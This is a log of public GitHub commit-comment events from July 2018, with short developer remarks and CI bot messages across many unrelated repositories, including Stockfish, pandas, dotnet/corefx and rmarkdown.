{"id":"7914361067","type":"CommitCommentEvent","actor":{"login":"andimik"},"repo":{"name":"satdreamgr/eti-tools"},"payload":{"comment":{"id":29585432,"position":null,"line":null,"path":null,"commit_id":"d75c1eae553885eb3c0a896023f8a32b2bbacb27","created_at":"2018-07-03T18:42:06Z","updated_at":"2018-07-03T18:42:06Z","author_association":"NONE","body":"Great! Now I have no problems with the message \"Stream disappears!\" and it works all the time without being root!\r\n\r\n` dvbstream -f 12572000 -s 6805 8192 -p V -o | ./fedi2eti 101 239.16.242.17 60017 | dablin_gtk `\r\n\r\n(here for Bayern 11D)\r\n"}},"created_at":"2018-07-03T18:42:06Z"}
{"id":"7914361984","type":"CommitCommentEvent","actor":{"login":"CaseyCarter"},"repo":{"name":"cplusplus/draft"},"payload":{"comment":{"id":29585434,"position":31,"line":1977,"path":"source/expressions.tex","commit_id":"fa323da9d0896fce007d70b5445d99bf3298027f","created_at":"2018-07-03T18:42:18Z","updated_at":"2018-07-03T18:42:18Z","author_association":"CONTRIBUTOR","body":"It's effectively equivalent to what I have here, but far more concise by virtue of invoking the satisfaction rules indirectly. I have a mild preference for the more direct invocation of the satisfaction rules in the current wording, but so far the majority disagrees with me."}},"created_at":"2018-07-03T18:42:18Z"}
{"id":"7914363184","type":"CommitCommentEvent","actor":{"login":"gyarados025"},"repo":{"name":"gyarados025/android_vendor_motorola_kinzie"},"payload":{"comment":{"id":29585435,"position":null,"line":null,"path":null,"commit_id":"e987563a37daa5c63b49c73c72dfa196c3f2caf1","created_at":"2018-07-03T18:42:32Z","updated_at":"2018-07-03T18:42:32Z","author_association":"OWNER","body":"Stock Rom Wallpapers"}},"created_at":"2018-07-03T18:42:32Z"}
{"id":"7914363495","type":"CommitCommentEvent","actor":{"login":"Tangol"},"repo":{"name":"villagedefrance/OpenCart-Overclocked"},"payload":{"comment":{"id":29585437,"position":null,"line":null,"path":null,"commit_id":"4c67a70ae741c7d0be423b8077e6464e7b56c381","created_at":"2018-07-03T18:42:36Z","updated_at":"2018-07-03T18:42:36Z","author_association":"NONE","body":"Can something be done to the **search** form, for it to return the exact keyword that was entered?\r\n\r\nFor example if you search for **macbook pro**, the search should return only the products that have **macbook pro** in their title.\r\n\r\nRight now, the search treats keywords as separate entities and returns products that have **macbook** and products that have **pro** in their titles.\r\n\r\n![search](https://user-images.githubusercontent.com/3336728/42238480-a431b8d6-7f09-11e8-90fd-e59108ccf2db.png)\r\n\r\nThis is so bad for stores that have hundreds of products...\r\n\r\nTested on https://github.com/villagedefrance/OpenCart-Overclocked/commit/e9f78afb46fdd8ffc06f97b3dd4b7a4f72e64703"}},"created_at":"2018-07-03T18:42:36Z"}
{"id":"7914363496","type":"CommitCommentEvent","actor":{"login":"VoyagerOne"},"repo":{"name":"VoyagerOne/Stockfish"},"payload":{"comment":{"id":29585438,"position":null,"line":null,"path":null,"commit_id":"88455b93deeee133149525271950e20bdfbbf425","created_at":"2018-07-03T18:42:36Z","updated_at":"2018-07-03T18:42:36Z","author_association":"OWNER","body":"@DU-jdto \r\nThis is a bug fix.  I believe this code logic is faulty."}},"created_at":"2018-07-03T18:42:36Z"}
{"id":"7914365775","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29585442,"position":null,"line":null,"path":null,"commit_id":"c6d06d8d0f59b201a6f7c792af17763a724a9816","created_at":"2018-07-03T18:43:06Z","updated_at":"2018-07-03T18:43:06Z","author_association":"OWNER","body":"# Specs execution successful\r\n:scroll: [View logs](http://bamboo.comnull)\r\n### Plans updated\r\n\r\nBamboo specs have been successfully imported and the following plans have been updated.\r\n\r\nProject | Plan | Build\r\n---|---|---\r\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\r\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\r\n\r\n### Deployments updated\r\n\r\nBamboo specs have been successfully imported and the following deployment projects have been updated.\r\n\r\n|Deployment project |\r\n----|\r\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\r\n"}},"created_at":"2018-07-03T18:43:06Z"}
{"id":"7914374418","type":"CommitCommentEvent","actor":{"login":"godric-cz"},"repo":{"name":"gamecon-cz/gamecon"},"payload":{"comment":{"id":29585464,"position":null,"line":null,"path":null,"commit_id":"98a58917dfc51b4c00f59ce0a9b9d31f98d8e054","created_at":"2018-07-03T18:44:56Z","updated_at":"2018-07-03T18:44:56Z","author_association":"CONTRIBUTOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [[1] Opravit graf v statistikách](https://trello.com/c/hJjYDT48/652-1-opravit-graf-v-statistik%C3%A1ch)"}},"created_at":"2018-07-03T18:44:56Z"}
{"id":"7914379039","type":"CommitCommentEvent","actor":{"login":"timwis"},"repo":{"name":"CityOfPhiladelphia/phila.gov-router"},"payload":{"comment":{"id":29585487,"position":null,"line":null,"path":null,"commit_id":"47d30fed2eb6978380c0c23cf3db617c4bdde376","created_at":"2018-07-03T18:45:54Z","updated_at":"2018-07-03T18:45:54Z","author_association":"MEMBER","body":"FYI @akennel when we add a `200` we should also add a `301` from `/rconotification` to `/rconotification/` otherwise `/rconotification` will 404."}},"created_at":"2018-07-03T18:45:54Z"}
{"id":"7914381284","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"FauziAkram/Stockfish"},"payload":{"comment":{"id":29585494,"position":null,"line":null,"path":null,"commit_id":"f63c2e1db7c65db8776fb469093e7befd0ae0004","created_at":"2018-07-03T18:46:21Z","updated_at":"2018-07-03T18:46:21Z","author_association":"NONE","body":"And I can assure you that if you have running an LTC like mine, one just can't wait the moment it finishes. Then tests like this are just annoying. "}},"created_at":"2018-07-03T18:46:21Z"}
{"id":"7914381713","type":"CommitCommentEvent","actor":{"login":"mmlado"},"repo":{"name":"deko88/Seat-vacancy"},"payload":{"comment":{"id":29585496,"position":61,"line":60,"path":"app/src/main/java/com/example/deko/classroom/SeatVacancy.java","commit_id":"1aa566e0722e6331b663e8e26df1bdfe631bbb4f","created_at":"2018-07-03T18:46:28Z","updated_at":"2018-07-03T18:46:28Z","author_association":"NONE","body":"I think you're on the wrong track. You probably want the seat list here and not the user list. I'm not sure where you store which student is in which seat or if the seat is taken. Please, direct me to the proper code."}},"created_at":"2018-07-03T18:46:28Z"}
{"id":"7914383551","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"FauziAkram/Stockfish"},"payload":{"comment":{"id":29585501,"position":null,"line":null,"path":null,"commit_id":"f63c2e1db7c65db8776fb469093e7befd0ae0004","created_at":"2018-07-03T18:46:50Z","updated_at":"2018-07-03T18:46:50Z","author_association":"NONE","body":"I see many objections against the VLTC so i have lowered throughput to 100."}},"created_at":"2018-07-03T18:46:50Z"}
{"id":"7914386198","type":"CommitCommentEvent","actor":{"login":"615283"},"repo":{"name":"AndrewAubury/DiscordSupport"},"payload":{"comment":{"id":29585510,"position":null,"line":null,"path":null,"commit_id":"53c4722a2af449ac812bafa0a7e3d34d114daddd","created_at":"2018-07-03T18:47:22Z","updated_at":"2018-07-03T18:47:22Z","author_association":"NONE","body":"To me, that is rude and offensive to someone who is trying to protect someone's work and your reputation. Be a little more grateful and also since Scarsz uses the GNU GPL, you must leave his copyright notices in the code, and use that license also."}},"created_at":"2018-07-03T18:47:22Z"}
{"id":"7914386923","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29585512,"position":null,"line":null,"path":null,"commit_id":"7d2a5639d81d9534e5b4be24b9af9d063091369e","created_at":"2018-07-03T18:47:31Z","updated_at":"2018-07-03T18:47:31Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#ci-398](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#ci-398).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-398-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-03T18:47:31Z"}
{"id":"7914387064","type":"CommitCommentEvent","actor":{"login":"garyskeete"},"repo":{"name":"garyskeete/linux-modder.github.io"},"payload":{"comment":{"id":29585514,"position":null,"line":null,"path":null,"commit_id":"4feea7020a433dda81297968d6e7d365f42194da","created_at":"2018-07-03T18:47:33Z","updated_at":"2018-07-03T18:47:33Z","author_association":"OWNER","body":"Layered approach same and different engines cross referencing and multiple applications"}},"created_at":"2018-07-03T18:47:33Z"}
{"id":"7914402844","type":"CommitCommentEvent","actor":{"login":"timwis"},"repo":{"name":"CityOfPhiladelphia/phila.gov-router"},"payload":{"comment":{"id":29585550,"position":64,"line":319,"path":"rules.txt","commit_id":"f330ee0e0265b989f10da966ce95f39f2d5eb9f6","created_at":"2018-07-03T18:50:51Z","updated_at":"2018-07-03T18:50:51Z","author_association":"MEMBER","body":"@akennel This dir is used by the ASM. I added it to get that scraping detection to pass. May not be necessary if we're whitelisted though."}},"created_at":"2018-07-03T18:50:51Z"}
{"id":"7914402878","type":"CommitCommentEvent","actor":{"login":"asbjornh"},"repo":{"name":"luizstacio/select-shell"},"payload":{"comment":{"id":29585551,"position":null,"line":null,"path":null,"commit_id":"7227bb8299311ccb0e025bb7b6b731a7f992c554","created_at":"2018-07-03T18:50:51Z","updated_at":"2018-07-03T18:50:51Z","author_association":"NONE","body":"Thanks!"}},"created_at":"2018-07-03T18:50:51Z"}
{"id":"7914406944","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29585561,"position":null,"line":null,"path":null,"commit_id":"49afbb1e033483ca751110cb07a8ef48ec451855","created_at":"2018-07-03T18:51:42Z","updated_at":"2018-07-03T18:51:42Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [wordpresss](https://wordpresss-static-docs.pantheonsite.io/docs) Multidev environment:\n- [/docs/wordpress-s3](https://wordpresss-static-docs.pantheonsite.io/docs/wordpress-s3)\n"}},"created_at":"2018-07-03T18:51:42Z"}
{"id":"7914413280","type":"CommitCommentEvent","actor":{"login":"cdumez"},"repo":{"name":"jonathanKingston/web-platform-tests"},"payload":{"comment":{"id":29585573,"position":null,"line":null,"path":null,"commit_id":"e7239ad8be67a490b080c8cdc6dc7f98518c15a6","created_at":"2018-07-03T18:53:02Z","updated_at":"2018-07-03T18:53:02Z","author_association":"NONE","body":"This failed to update interfaces/dom.idl."}},"created_at":"2018-07-03T18:53:02Z"}
{"id":"7914418777","type":"CommitCommentEvent","actor":{"login":"rbomhof"},"repo":{"name":"rbomhof/irc-d8-workflow"},"payload":{"comment":{"id":29585580,"position":null,"line":null,"path":null,"commit_id":"035d4fb5e8b7701dae225645f928ea82ca2b9bff","created_at":"2018-07-03T18:54:11Z","updated_at":"2018-07-03T18:54:11Z","author_association":"OWNER","body":"Created multidev environment [irc-d8-workflow#pr-8](https://dashboard.pantheon.io/sites/0c518be8-4ef1-48d0-bf17-f9310a806c4d#pr-8).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-8-irc-d8-workflow.pantheonsite.io/)"}},"created_at":"2018-07-03T18:54:11Z"}
{"id":"7914419579","type":"CommitCommentEvent","actor":{"login":"zhenchengcode"},"repo":{"name":"zhenchengcode/angular-app-template"},"payload":{"comment":{"id":29585585,"position":null,"line":null,"path":null,"commit_id":"d4dede5b131f304cefd3a90bc1dcb0c44254c9b0","created_at":"2018-07-03T18:54:21Z","updated_at":"2018-07-03T18:54:21Z","author_association":"OWNER","body":"Problem:\r\nwhen you click 2nd dropdown, previous dropdown stays focused (verify by printing document.activeElment), so click event will be apply to previous as well\r\nFix:\r\ndocument.activeElement.blur() will reset the focused element to default"}},"created_at":"2018-07-03T18:54:21Z"}
{"id":"7914421863","type":"CommitCommentEvent","actor":{"login":"K6205"},"repo":{"name":"rasple/sw-eng-jfx"},"payload":{"comment":{"id":29585589,"position":null,"line":null,"path":null,"commit_id":"ff9e7f1f7d8801ea3fd99a5a54084cc6ebcf109c","created_at":"2018-07-03T18:54:51Z","updated_at":"2018-07-03T18:54:51Z","author_association":"COLLABORATOR","body":"<code>Jon Skeet</code>"}},"created_at":"2018-07-03T18:54:51Z"}
{"id":"7914425792","type":"CommitCommentEvent","actor":{"login":"garyskeete"},"repo":{"name":"garyskeete/linux-modder.github.io"},"payload":{"comment":{"id":29585591,"position":null,"line":null,"path":null,"commit_id":"4feea7020a433dda81297968d6e7d365f42194da","created_at":"2018-07-03T18:55:41Z","updated_at":"2018-07-03T18:55:41Z","author_association":"OWNER","body":"Engine Temperature Control\r\nSynchronized Output"}},"created_at":"2018-07-03T18:55:41Z"}
{"id":"7914427762","type":"CommitCommentEvent","actor":{"login":"aoroberson"},"repo":{"name":"ikathegreat/roicalc"},"payload":{"comment":{"id":29585595,"position":null,"line":null,"path":null,"commit_id":"8450cdc18f7da2f68aeafd56dd2a689a4fa16303","created_at":"2018-07-03T18:56:07Z","updated_at":"2018-07-03T18:56:07Z","author_association":"COLLABORATOR","body":"Lather, rinse, and repeat..."}},"created_at":"2018-07-03T18:56:07Z"}
{"id":"7914428493","type":"CommitCommentEvent","actor":{"login":"jonathanekim"},"repo":{"name":"google/promises"},"payload":{"comment":{"id":29585597,"position":17,"line":108,"path":"Tests/FBLPromisesTests/FBLPromise+RetryTests.m","commit_id":"162675d6ef9273a97dea7289fe22105a110257d8","created_at":"2018-07-03T18:56:15Z","updated_at":"2018-07-03T18:56:15Z","author_association":"COLLABORATOR","body":"`FBLPromiseRetryDefaultDelayInterval` instead of `customDelay`?"}},"created_at":"2018-07-03T18:56:15Z"}
{"id":"7914437120","type":"CommitCommentEvent","actor":{"login":"fjuma"},"repo":{"name":"justinmcook/wildfly"},"payload":{"comment":{"id":29585616,"position":1,"line":1,"path":"testsuite/integration/ws/src/test/java/org/jboss/as/test/integration/ws/wsse/trust/WEB-INF/stsKeystore.properties","commit_id":"43560a4da3068fcc73de65eadda0ef270da1e84c","created_at":"2018-07-03T18:58:03Z","updated_at":"2018-07-03T18:58:03Z","author_association":"NONE","body":"What's the reason for deleting the properties files and generating them instead? Is it possible to generate the keystores using the same names as before to avoid needing to generate these files?"}},"created_at":"2018-07-03T18:58:03Z"}
{"id":"7914438065","type":"CommitCommentEvent","actor":{"login":"emesterhazy"},"repo":{"name":"pandas-dev/pandas"},"payload":{"comment":{"id":29585619,"position":57,"line":4288,"path":"pandas/core/frame.py","commit_id":"38b8fcadb578d723a50933b5744d1bbe36c99178","created_at":"2018-07-03T18:58:15Z","updated_at":"2018-07-03T18:58:15Z","author_association":"NONE","body":"Shouldn't this say that Column A in `other` has a 2, but not at index 1?"}},"created_at":"2018-07-03T18:58:15Z"}
{"id":"7914443958","type":"CommitCommentEvent","actor":{"login":"pjozefczyk"},"repo":{"name":"mmagnus/geekbook"},"payload":{"comment":{"id":29585630,"position":null,"line":null,"path":null,"commit_id":"6a1014497690742c6c2aa20cf640fb0d8d7c2724","created_at":"2018-07-03T18:59:27Z","updated_at":"2018-07-03T18:59:27Z","author_association":"COLLABORATOR","body":"also fix #75 "}},"created_at":"2018-07-03T18:59:27Z"}
{"id":"7914444211","type":"CommitCommentEvent","actor":{"login":"cdumez"},"repo":{"name":"web-platform-tests/wpt"},"payload":{"comment":{"id":29585631,"position":null,"line":null,"path":null,"commit_id":"c3db018b96681af3c73ec331ecc01d38e48b8b10","created_at":"2018-07-03T18:59:30Z","updated_at":"2018-07-03T18:59:30Z","author_association":"CONTRIBUTOR","body":"We should probably update dom.idl too."}},"created_at":"2018-07-03T18:59:30Z"}
{"id":"7914445960","type":"CommitCommentEvent","actor":{"login":"HuzefaMandvi"},"repo":{"name":"CCI-MOC/ORE"},"payload":{"comment":{"id":29585635,"position":null,"line":null,"path":null,"commit_id":"34a8f1e60310b5cb2364767712083ef838e384b0","created_at":"2018-07-03T18:59:51Z","updated_at":"2018-07-03T18:59:51Z","author_association":"COLLABORATOR","body":"#15 "}},"created_at":"2018-07-03T18:59:51Z"}
{"id":"7914452041","type":"CommitCommentEvent","actor":{"login":"fjuma"},"repo":{"name":"justinmcook/wildfly"},"payload":{"comment":{"id":29585650,"position":4,"line":51,"path":"testsuite/integration/ws/pom.xml","commit_id":"43560a4da3068fcc73de65eadda0ef270da1e84c","created_at":"2018-07-03T19:01:05Z","updated_at":"2018-07-03T19:01:05Z","author_association":"NONE","body":"For WildFly Core, the only keystores generated using this maven plugin were the ones that were used to set SSL related system properties. Is that the case here? Or does it simplify things to do it this way?"}},"created_at":"2018-07-03T19:01:05Z"}
{"id":"7914455533","type":"CommitCommentEvent","actor":{"login":"candirufish"},"repo":{"name":"FauziAkram/Stockfish"},"payload":{"comment":{"id":29585659,"position":null,"line":null,"path":null,"commit_id":"f63c2e1db7c65db8776fb469093e7befd0ae0004","created_at":"2018-07-03T19:01:49Z","updated_at":"2018-07-03T19:01:49Z","author_association":"NONE","body":"Maybe if it doesn't pass after like 60k games, maybe it is ok to quit it. Since it will now be known that it will take more games than the first ltc for it to pass and it obviously lost some elo due to many more games required to pass hence bad scaling."}},"created_at":"2018-07-03T19:01:49Z"}
{"id":"7914456314","type":"CommitCommentEvent","actor":{"login":"igorpecovnik"},"repo":{"name":"Staars/build"},"payload":{"comment":{"id":29585661,"position":null,"line":null,"path":null,"commit_id":"332ebdd67ee7cfd6264a3a52ba591e43fc1ed62d","created_at":"2018-07-03T19:02:00Z","updated_at":"2018-07-03T19:02:00Z","author_association":"NONE","body":"Ups, my bad. I'll check it later on."}},"created_at":"2018-07-03T19:02:00Z"}
{"id":"7914458406","type":"CommitCommentEvent","actor":{"login":"rbomhof"},"repo":{"name":"rbomhof/irc-d8-workflow"},"payload":{"comment":{"id":29585665,"position":null,"line":null,"path":null,"commit_id":"0e7eb2ac659aa3083498c65ce1dd62dab3bb301b","created_at":"2018-07-03T19:02:25Z","updated_at":"2018-07-03T19:02:25Z","author_association":"OWNER","body":"Created multidev environment [irc-d8-workflow#ci-33](https://dashboard.pantheon.io/sites/0c518be8-4ef1-48d0-bf17-f9310a806c4d#ci-33).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-33-irc-d8-workflow.pantheonsite.io/)"}},"created_at":"2018-07-03T19:02:25Z"}
{"id":"7914459556","type":"CommitCommentEvent","actor":{"login":"clownprincejoker"},"repo":{"name":"clownprincejoker/globalcarshop"},"payload":{"comment":{"id":29585669,"position":4,"line":18,"path":"database/migrations/2018_07_03_150914_create_part_sub_categories_table.php","commit_id":"3bfbdda8d2607f2e3eb878edc546065e5d2f4092","created_at":"2018-07-03T19:02:41Z","updated_at":"2018-07-03T19:02:41Z","author_association":"OWNER","body":"nice"}},"created_at":"2018-07-03T19:02:41Z"}
{"id":"7914465118","type":"CommitCommentEvent","actor":{"login":"yihui"},"repo":{"name":"rstudio/rmarkdown"},"payload":{"comment":{"id":29585684,"position":5,"line":40,"path":"R/render.R","commit_id":"a18c447a74be338ca520afab77cab72d224ec3ff","created_at":"2018-07-03T19:03:52Z","updated_at":"2018-07-03T19:03:52Z","author_association":"MEMBER","body":"You forgot to indent `toc: true` above, and `highlight` should be indented by four spaces instead of two."}},"created_at":"2018-07-03T19:03:52Z"}
{"id":"7914465967","type":"CommitCommentEvent","actor":{"login":"yihui"},"repo":{"name":"rstudio/rmarkdown"},"payload":{"comment":{"id":29585690,"position":14,"line":50,"path":"R/render.R","commit_id":"a18c447a74be338ca520afab77cab72d224ec3ff","created_at":"2018-07-03T19:04:02Z","updated_at":"2018-07-03T19:04:02Z","author_association":"MEMBER","body":"Same problem here."}},"created_at":"2018-07-03T19:04:02Z"}
{"id":"7914466555","type":"CommitCommentEvent","actor":{"login":"kranar"},"repo":{"name":"eidolonsystems/nexus"},"payload":{"comment":{"id":29585694,"position":9,"line":37,"path":"Applications/web_portal/web_app/library/source/pages/dashboard_page/side_menu.tsx","commit_id":"8fd1fb26a847d3bcf2f927b89bd4664fcd6c97bf","created_at":"2018-07-03T19:04:11Z","updated_at":"2018-07-03T19:04:11Z","author_association":"COLLABORATOR","body":"Blank line goes before the comment."}},"created_at":"2018-07-03T19:04:11Z"}
{"id":"7914466610","type":"CommitCommentEvent","actor":{"login":"yihui"},"repo":{"name":"rstudio/rmarkdown"},"payload":{"comment":{"id":29585695,"position":18,"line":53,"path":"R/render.R","commit_id":"a18c447a74be338ca520afab77cab72d224ec3ff","created_at":"2018-07-03T19:04:11Z","updated_at":"2018-07-03T19:04:11Z","author_association":"MEMBER","body":"And here."}},"created_at":"2018-07-03T19:04:11Z"}
{"id":"7914467488","type":"CommitCommentEvent","actor":{"login":"kranar"},"repo":{"name":"eidolonsystems/nexus"},"payload":{"comment":{"id":29585707,"position":17,"line":40,"path":"Applications/web_portal/web_app/library/source/pages/dashboard_page/side_menu.tsx","commit_id":"8fd1fb26a847d3bcf2f927b89bd4664fcd6c97bf","created_at":"2018-07-03T19:04:23Z","updated_at":"2018-07-03T19:04:23Z","author_association":"COLLABORATOR","body":"Make it a standalone class."}},"created_at":"2018-07-03T19:04:23Z"}
{"id":"7914472449","type":"CommitCommentEvent","actor":{"login":"jkotas"},"repo":{"name":"dotnet/corefx"},"payload":{"comment":{"id":29585736,"position":13,"line":89,"path":"src/System.Security.Claims/src/System/Security/Claims/GenericPrincipal.cs","commit_id":"1afef02f82e4091a29ccd53d8e31bca1360b7005","created_at":"2018-07-03T19:05:27Z","updated_at":"2018-07-03T19:05:27Z","author_association":"MEMBER","body":"This should create a new instance each time - the origin code was also always creating new instance as well."}},"created_at":"2018-07-03T19:05:27Z"}
{"id":"7914474013","type":"CommitCommentEvent","actor":{"login":"jkotas"},"repo":{"name":"dotnet/corefx"},"payload":{"comment":{"id":29585747,"position":65,"line":306,"path":"src/System.Runtime.Extensions/src/System/AppDomain.cs","commit_id":"1afef02f82e4091a29ccd53d8e31bca1360b7005","created_at":"2018-07-03T19:05:48Z","updated_at":"2018-07-03T19:05:48Z","author_association":"MEMBER","body":"Nit: `.Invoke` is unnecessary"}},"created_at":"2018-07-03T19:05:48Z"}
{"id":"7914474647","type":"CommitCommentEvent","actor":{"login":"dan-katz"},"repo":{"name":"dan-katz/blueprint"},"payload":{"comment":{"id":29585748,"position":null,"line":null,"path":null,"commit_id":"09002f0fe00d0e81ed29ad76c422b5197ab0e395","created_at":"2018-07-03T19:05:57Z","updated_at":"2018-07-03T19:05:57Z","author_association":"OWNER","body":"<h3>check for inputProps value when setting query</h3>\n\nPreview: <strong><a href='https://53-127456300-gh.circle-artifacts.com/0/home/circleci/project/packages/docs-app/dist/index.html' target='_blank'>documentation</a> | <a href='https://53-127456300-gh.circle-artifacts.com/0/home/circleci/project/packages/landing-app/dist/index.html' target='_blank'>landing</a> | <a href='https://53-127456300-gh.circle-artifacts.com/0/home/circleci/project/packages/table-dev-app/dist/index.html' target='_blank'>table</a></strong>"}},"created_at":"2018-07-03T19:05:57Z"}
{"id":"7914475114","type":"CommitCommentEvent","actor":{"login":"jkotas"},"repo":{"name":"dotnet/corefx"},"payload":{"comment":{"id":29585749,"position":80,"line":320,"path":"src/System.Runtime.Extensions/src/System/AppDomain.cs","commit_id":"1afef02f82e4091a29ccd53d8e31bca1360b7005","created_at":"2018-07-03T19:06:03Z","updated_at":"2018-07-03T19:06:03Z","author_association":"MEMBER","body":"Switch this to the delegate plan as well?"}},"created_at":"2018-07-03T19:06:03Z"}
{"id":"7914475857","type":"CommitCommentEvent","actor":{"login":"nicola-spire"},"repo":{"name":"eidolonsystems/nexus"},"payload":{"comment":{"id":29585751,"position":17,"line":40,"path":"Applications/web_portal/web_app/library/source/pages/dashboard_page/side_menu.tsx","commit_id":"8fd1fb26a847d3bcf2f927b89bd4664fcd6c97bf","created_at":"2018-07-03T19:06:12Z","updated_at":"2018-07-03T19:06:12Z","author_association":"COLLABORATOR","body":"New file or same?\n\nOn Tue, Jul 3, 2018 at 3:04 PM kranar <notifications@github.com> wrote:\n\n> Make it a standalone class.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/eidolonsystems/nexus/commit/8fd1fb26a847d3bcf2f927b89bd4664fcd6c97bf#commitcomment-29585707>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AlFi5hmRKFUekgdhd8TiOJOWzK-vlMK3ks5uC8A3gaJpZM4VBekh>\n> .\n>\n"}},"created_at":"2018-07-03T19:06:12Z"}
{"id":"7914475881","type":"CommitCommentEvent","actor":{"login":"vindard"},"repo":{"name":"peakshift/telegram-dogecoin"},"payload":{"comment":{"id":29585752,"position":null,"line":null,"path":null,"commit_id":"a42e01b21101993b62a6b2ffd3f502fcdbcee1a1","created_at":"2018-07-03T19:06:13Z","updated_at":"2018-07-03T19:06:13Z","author_association":"COLLABORATOR","body":"Funny sidenote for myself, [this (deleted alternative commit)](https://github.com/peakshift/telegram-dogecoin/commit/aa29298a1da074007c4672f11967fc5559831a74) still exists as of this comment even though it's not longer a part of the repo displayed.\r\n\r\nTo see, how long it remains hosted on github."}},"created_at":"2018-07-03T19:06:13Z"}
{"id":"7914475892","type":"CommitCommentEvent","actor":{"login":"ZiroKyl"},"repo":{"name":"ZiroKyl/LLTR-Simulation-Model"},"payload":{"comment":{"id":29585753,"position":1,"line":1,"path":"inet/src/inet/applications/lltrapp/LLTRApp.cc","commit_id":"e3ca0657104e4bf3692c0cca799a83a959aa2696","created_at":"2018-07-03T19:06:13Z","updated_at":"2018-07-03T19:06:13Z","author_association":"OWNER","body":"Woops – забыл заменить `LLTRSuperApp.cc` на `LLTRApp.cc`, исправлено только в 25e1bca2162efbea0e954306e79db35aaef0a028 ( tag [a1_v0.26.0](https://github.com/ZiroKyl/LLTR-Simulation-Model/tree/a1_v0.26.0) )."}},"created_at":"2018-07-03T19:06:13Z"}
{"id":"7914476347","type":"CommitCommentEvent","actor":{"login":"mavam"},"repo":{"name":"vast-io/vast"},"payload":{"comment":{"id":29585755,"position":13,"line":82,"path":"libvast/src/table_slice.cpp","commit_id":"5fd93ccc976a0d478468abf58c3d8705c3cf954b","created_at":"2018-07-03T19:06:19Z","updated_at":"2018-07-03T19:06:19Z","author_association":"MEMBER","body":"@Neverlord I think this should be fixed with of #220. Mind giving it a shot?"}},"created_at":"2018-07-03T19:06:19Z"}
{"id":"7914476848","type":"CommitCommentEvent","actor":{"login":"vtudorache"},"repo":{"name":"vtudorache/properties-for-python"},"payload":{"comment":{"id":29585757,"position":null,"line":null,"path":null,"commit_id":"7f8b5154ce5b31d44c7109a18f43b165fd6fd65e","created_at":"2018-07-03T19:06:25Z","updated_at":"2018-07-03T19:06:25Z","author_association":"OWNER","body":"Restored version."}},"created_at":"2018-07-03T19:06:25Z"}
{"id":"7914476998","type":"CommitCommentEvent","actor":{"login":"kranar"},"repo":{"name":"eidolonsystems/nexus"},"payload":{"comment":{"id":29585758,"position":17,"line":40,"path":"Applications/web_portal/web_app/library/source/pages/dashboard_page/side_menu.tsx","commit_id":"8fd1fb26a847d3bcf2f927b89bd4664fcd6c97bf","created_at":"2018-07-03T19:06:27Z","updated_at":"2018-07-03T19:06:27Z","author_association":"COLLABORATOR","body":"Same file.\n\nOn Tue, Jul 3, 2018 at 3:06 PM, nicola-spire <notifications@github.com>\nwrote:\n\n> New file or same?\n>\n> On Tue, Jul 3, 2018 at 3:04 PM kranar <notifications@github.com> wrote:\n>\n> > Make it a standalone class.\n> >\n> > —\n> > You are receiving this because you authored the thread.\n> > Reply to this email directly, view it on GitHub\n> > <https://github.com/eidolonsystems/nexus/commit/\n> 8fd1fb26a847d3bcf2f927b89bd4664fcd6c97bf#commitcomment-29585707>,\n> > or mute the thread\n> > <https://github.com/notifications/unsubscribe-auth/\n> AlFi5hmRKFUekgdhd8TiOJOWzK-vlMK3ks5uC8A3gaJpZM4VBekh>\n> > .\n> >\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/eidolonsystems/nexus/commit/8fd1fb26a847d3bcf2f927b89bd4664fcd6c97bf#commitcomment-29585751>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/APzFGS-WhJ1svzWB6M6KrO83fZihd7w6ks5uC8CkgaJpZM4VBekh>\n> .\n>\n\n\n\n-- \nKamal Mansouri\nComputer Programmer\n+1 647-648-0498\n"}},"created_at":"2018-07-03T19:06:27Z"}
{"id":"7914477023","type":"CommitCommentEvent","actor":{"login":"jkotas"},"repo":{"name":"dotnet/corefx"},"payload":{"comment":{"id":29585759,"position":13,"line":89,"path":"src/System.Security.Claims/src/System/Security/Claims/GenericPrincipal.cs","commit_id":"1afef02f82e4091a29ccd53d8e31bca1360b7005","created_at":"2018-07-03T19:06:27Z","updated_at":"2018-07-03T19:06:27Z","author_association":"MEMBER","body":"I think this method needs to be public. Otherwise, it is going to be trimmed by the ILLinker."}},"created_at":"2018-07-03T19:06:27Z"}
